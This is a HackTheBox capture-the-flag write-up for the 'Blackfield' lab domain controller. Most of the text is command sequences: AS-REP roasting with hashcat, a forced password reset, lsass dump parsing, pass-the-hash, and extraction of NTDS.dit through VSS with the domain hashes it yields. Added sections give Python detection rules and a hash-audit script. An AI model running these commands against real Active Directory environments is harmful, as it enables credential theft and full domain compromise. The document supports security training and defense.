Blackfield.
Hard Windows Active Directory AS-REP Roast lsass Dump SeBackupPrivilege HackTheBox
Hard Windows Active Directory machine with a clean, realistic attack chain. Guest SMB access leaks hundreds of usernames from a profiles share. AS-REP roasting cracks the support account. BloodHound reveals ForceChangePassword over audit2020, whose forensic share holds an lsass memory dump. pypykatz extracts the svc_backup NT hash — a Backup Operator account. SeBackupPrivilege combined with a VSS shadow copy lets us extract the locked NTDS.dit, giving us the domain Administrator hash.
User Flag
3920bb317axxxxxxxxxxxxxxxxxxxxxx
Root Flag
4375a629c7xxxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance

Full port scan reveals a classic DC profile. The domain is BLACKFIELD.local. No starting credentials — we begin unauthenticated.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.229.17
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Windows KDC
389/tcp  open  ldap          Active Directory (Domain: BLACKFIELD.local)
445/tcp  open  microsoft-ds  SMB (signing required)
5985/tcp open  wsman         WinRM
| clock-skew: +7h0m3s
clock skew +7h: Kerberos requires clocks within 5 minutes of the DC. If you see KRB_AP_ERR_SKEW, sync first: sudo ntpdate -u 10.129.229.17. On this box NTLM is still available so it's rarely a blocker, but keep it in mind.
env setup
$ export IP=10.129.229.17
$ export DOMAIN=BLACKFIELD.local
02 SMB Enumeration — Username Leak via profiles$

Null session is denied but the guest account (blank password) works. The profiles$ share contains hundreds of empty user profile directories — the directory names are valid AD usernames.

guest share enum
$ nxc smb $IP -u 'guest' -p '' --shares
profiles$   READ
forensic    (no access)
IPC$        READ
extract usernames from profiles$
$ smbclient //$IP/profiles$ -N -c ls | awk '{print $1}' | grep -v '^\.' | grep -v '^$' > users.txt
finding: ~300 AD usernames extracted. Notable ones: audit2020, support, svc_backup. The share exists purely for profile storage — guest read access exposes the entire user list.
03 AS-REP Roasting — support

AS-REP roasting targets accounts with Kerberos pre-authentication disabled. Without pre-auth, the KDC answers an AS-REQ from any unauthenticated requester with an AS-REP whose encrypted part is keyed with the account's password-derived key; that ciphertext can be taken offline and cracked by guessing passwords, with no further interaction with the DC.

GetNPUsers — scan full user list
$ impacket-GetNPUsers BLACKFIELD.local/ -dc-ip $IP -no-pass -usersfile users.txt
$krb5asrep$23$support@BLACKFIELD.LOCAL:934e6dd306...016d4f
hashcat — crack AS-REP hash
$ hashcat -m 18200 asrep_hash.txt /usr/share/wordlists/rockyou.txt
support : #00^BlackKnight
credential: support:#00^BlackKnight — cracked in ~6 seconds.
04 BloodHound — ACL Attack Path

With valid credentials, collect all BloodHound data to map AD attack paths.

bloodhound-python collection
$ bloodhound-python -u support -p '#00^BlackKnight' -d BLACKFIELD.local -ns $IP -c All --zip
attack path discovered: support →(ForceChangePassword)→ audit2020. ForceChangePassword allows changing a user's password without knowing their current one — full account takeover with no prior knowledge.
05 ForceChangePassword → audit2020

Use rpcclient to set audit2020's password directly over SMB/IPC$ (the SAMR pipe). Info level 23 selects the USER_INFO_23 structure, which carries a new password and is applied as an administrative reset rather than a user-initiated change, so the caller never supplies the current password; the ForceChangePassword right on audit2020 is what authorizes support to perform it.

rpcclient — force password change
$ rpcclient -U "support%#00^BlackKnight" $IP \
    -c "setuserinfo2 audit2020 23 'Password123!'"
verify — forensic share now readable
$ nxc smb $IP -u audit2020 -p 'Password123!' --shares
forensic    READ
06 forensic Share — lsass Memory Dump

The forensic share contains process memory dumps in memory_analysis/. The critical file is lsass.zip — LSASS (Local Security Authority Subsystem Service) handles Windows authentication and holds NT hashes and sometimes plaintext credentials for all logged-in users.

Standard smbclient get times out on large files. Use impacket-smbclient instead.

download lsass.zip via impacket-smbclient
$ impacket-smbclient 'BLACKFIELD.local/audit2020:Password123!@'$IP
# use forensic
# cd memory_analysis
# get lsass.zip
pypykatz — parse lsass minidump
$ unzip lsass.zip
$ pypykatz lsa minidump lsass.DMP 2>/dev/null | grep -A5 "svc_backup"
Username: svc_backup
NT: 9658d1d1dcd9250115e2205d9f48400d
credential: svc_backup NT hash 9658d1d1dcd9250115e2205d9f48400d. Storing process memory dumps on a network share is catastrophic — LSASS holds live credentials for every authenticated session.
07 Foothold — svc_backup via Pass-the-Hash

Pass the NT hash directly to evil-winrm — no password cracking needed.

evil-winrm PTH → user flag
$ nxc winrm $IP -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'
[+] BLACKFIELD.local\svc_backup (Pwn3d!)
$ evil-winrm -i $IP -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt
3920bb317axxxxxxxxxxxxxxxxxxxxxx
confirm SeBackupPrivilege
*Evil-WinRM* PS C:\> whoami /priv
SeBackupPrivilege    Back up files and directories    Enabled
key privilege: svc_backup is a member of Backup Operators. SeBackupPrivilege lets a process open any file for backup regardless of its ACL, which amounts to read access to the entire filesystem; it does not override exclusive locks held by running services, which is the problem the next section deals with.
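Each of the three pivots above (AS-REP roasting in 03, the forced password reset in 05, the Backup Operator logon in 07) leaves a distinct Windows Security event on the DC. The following is an added example, not part of the original writeup, of detection logic over those events; the event records are constructed sample dicts shaped like the relevant fields of 4768, 4724 and 4672, and ADMIN_ALLOWLIST is an assumed list of accounts expected to hold these rights.

```python
# Added example (not from the original writeup): detection rules for three
# Security events this attack chain produces on the DC. Event records below
# are constructed samples; ADMIN_ALLOWLIST is an assumption for the demo.

ADMIN_ALLOWLIST = {"Administrator"}

def is_asrep_roast(ev):
    """4768 with Pre-Authentication Type 0 and RC4 (0x17) ticket encryption:
    a TGT issued with no pre-auth, the AS-REP roasting fingerprint."""
    return (ev["id"] == 4768 and ev.get("pre_auth_type") == 0
            and ev.get("ticket_enc") == "0x17")

def is_forced_reset(ev):
    """4724 (password reset attempt): a non-admin subject resets another
    account's password without the old one, as ForceChangePassword abuse does."""
    return (ev["id"] == 4724 and ev["subject"] != ev["target"]
            and ev["subject"] not in ADMIN_ALLOWLIST)

def is_backup_priv_logon(ev):
    """4672 (special privileges assigned) carrying SeBackupPrivilege for an
    account outside the allowlist: a Backup Operator-level logon."""
    return (ev["id"] == 4672 and "SeBackupPrivilege" in ev.get("privs", ())
            and ev["subject"] not in ADMIN_ALLOWLIST)

RULES = [("asrep_roast", is_asrep_roast),
         ("forced_password_reset", is_forced_reset),
         ("backup_privilege_logon", is_backup_priv_logon)]

def triage(events):
    """Return (rule, account) pairs; account is the target for 4768/4724
    and the logging-on subject for 4672."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev.get("target", ev["subject"])))
    return hits

SAMPLE_EVENTS = [  # constructed records, not a real export
    {"id": 4768, "subject": "-", "target": "support", "pre_auth_type": 0, "ticket_enc": "0x17"},
    {"id": 4768, "subject": "-", "target": "jdoe", "pre_auth_type": 2, "ticket_enc": "0x12"},
    {"id": 4724, "subject": "support", "target": "audit2020"},
    {"id": 4724, "subject": "Administrator", "target": "jdoe"},
    {"id": 4672, "subject": "svc_backup", "privs": ["SeBackupPrivilege", "SeRestorePrivilege"]},
    {"id": 4672, "subject": "Administrator", "privs": ["SeBackupPrivilege"]},
]
```

Running triage(SAMPLE_EVENTS) flags exactly the three events that correspond to this chain and ignores the AES pre-authenticated logon and the administrator's own actions.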
08 Privilege Escalation — SeBackupPrivilege → NTDS.dit

Why NTDS.dit, not SAM? SAM stores hashes for local accounts only. On a Domain Controller, the domain Administrator hash lives in NTDS.dit at C:\Windows\NTDS\ntds.dit — the Active Directory database containing every domain account's NT hash. NTDS.dit is locked by the AD DS service while running; even with SeBackupPrivilege you can't copy it directly.

The solution: Volume Shadow Copy (VSS). VSS creates a point-in-time snapshot of a volume including locked files. We create a shadow copy of C:\, expose it as Z:\, then copy NTDS.dit from the snapshot where it isn't locked.

Step 1 — Create the diskshadow script on Kali. The script must use Windows line endings (CRLF) or diskshadow silently fails.

kali — create diskshadow script
$ cat > /tmp/shadow.dsh << 'EOF'
set context persistent nowriters
add volume c: alias blackfield
create
expose %blackfield% z:
EOF
$ unix2dos /tmp/shadow.dsh
unix2dos is mandatory: diskshadow parses each line expecting CRLF. With LF-only line endings it silently skips commands or errors out. The VSS context never gets created.

Step 2 — Execute on target.

evil-winrm — create VSS shadow copy
*Evil-WinRM* PS C:\> mkdir C:\temp
*Evil-WinRM* PS C:\> cd C:\temp
*Evil-WinRM* PS C:\temp> upload /tmp/shadow.dsh shadow.dsh
*Evil-WinRM* PS C:\temp> diskshadow /s shadow.dsh
...
Shadow copy created. Exposed as Z:\

Step 3 — Copy NTDS.dit from the shadow copy using backup semantics.

robocopy /b — bypass ACLs via SeBackupPrivilege
*Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds C:\temp ntds.dit
why robocopy /b? The /b flag enables backup mode: files are opened with backup semantics, which is what makes the already-enabled SeBackupPrivilege take effect and bypass ACL checks. Normal file copy commands open files the ordinary way and never exercise the privilege even though it is present in the token.

Step 4 — Save the SYSTEM hive. NTDS.dit hashes are encrypted with a boot key stored in the SYSTEM registry hive — without it, secretsdump can't decrypt them.

save SYSTEM hive + download both files
*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM C:\temp\system.hive /y
*Evil-WinRM* PS C:\temp> download ntds.dit
*Evil-WinRM* PS C:\temp> download system.hive
09 Root — secretsdump → Administrator Hash
impacket-secretsdump — extract all domain hashes
$ impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
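The secretsdump output above follows the pwdump-style user:rid:lmhash:nthash::: layout, and the same dump is what a defender runs through a password audit after an NTDS extraction. The following is an added example, not from the original writeup or from impacket, that parses that format and reports the three findings such an audit usually starts with: LM hashes still being stored, blank passwords, and NT hashes shared between accounts. The sample lines are constructed with placeholder hash values.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password (LM storage off)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password
# Matches "user:rid:lm:nt:::" with an optional "DOMAIN\" prefix, as secretsdump prints.
LINE_RE = re.compile(r"^(?:[^\\:]+\\)?([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

def parse_secretsdump(text):
    """Return (user, rid, lm, nt) tuples for every hash line; other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            rows.append((user, int(rid), lm.lower(), nt.lower()))
    return rows

def audit(rows):
    """Flag stored LM hashes, blank passwords, and NT hashes reused across user accounts."""
    findings = []
    by_nt = defaultdict(list)
    for user, rid, lm, nt in rows:
        if lm != EMPTY_LM:
            findings.append(("lm_hash_stored", user))
        if nt == EMPTY_NT:
            findings.append(("blank_password", user))
        if not user.endswith("$"):            # machine accounts have random passwords
            by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if len(users) > 1:
            findings.append(("shared_password", ",".join(sorted(users))))
    return findings

# Constructed sample in secretsdump's output format; hashes are placeholders.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BLACKFIELD.local\\svc_legacy:1500:00112233445566778899aabbccddeeff:fedcba9876543210fedcba9876543210:::
helpdesk1:1501:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
[*] Cleaning up...
"""

if __name__ == "__main__":
    for finding in audit(parse_secretsdump(SAMPLE)):
        print(finding)
```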
evil-winrm PTH as Administrator → root flag
$ evil-winrm -i $IP -u Administrator -H '184fb5e5178480be64824d4cd53b99ee'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
4375a629c7xxxxxxxxxxxxxxxxxxxxxx
10 Full Attack Chain
attack chain summary
Anonymous / guest SMB → profiles$ share → ~300 AD usernames extracted
  │
  ▼
AS-REP Roasting (pre-auth disabled): GetNPUsers → hashcat -m 18200 → support:#00^BlackKnight
  │
  ▼
BloodHound: support →(ForceChangePassword)→ audit2020
  │
  ▼
rpcclient setuserinfo2 → reset audit2020 password → audit2020:Password123! → forensic share READ
  │
  ▼
lsass.zip download → pypykatz minidump parse → svc_backup NT:9658d1d1dcd9250115e2205d9f48400d
  │
  ▼
Pass-the-Hash → evil-winrm → user.txt ✓
SeBackupPrivilege confirmed (Backup Operators)
  │
  ▼
diskshadow (CRLF script) → VSS shadow copy → Z:\
robocopy /b → ntds.dit + reg save → system.hive
  │
  ▼
impacket-secretsdump LOCAL → Administrator NT:184fb5e5178480be64824d4cd53b99ee
  │
  ▼
Pass-the-Hash → evil-winrm → root.txt ✓
key takeaways:
· Guest access to a profiles share leaks the entire user list — perfect AS-REP/spray target
· ForceChangePassword gives full account takeover with no knowledge of the current password
· LSASS memory dumps on network shares expose live NT hashes for all authenticated sessions
· SAM holds local accounts only — on a DC you need NTDS.dit for domain hashes
· SeBackupPrivilege = near-equivalent to Domain Admin; Backup Operators must be treated as a privileged group
· VSS shadow copies bypass file locks — the only reliable way to copy NTDS.dit from a live DC
· Both NTDS.dit and the SYSTEM hive are required: hashes are encrypted with the boot key stored in SYSTEM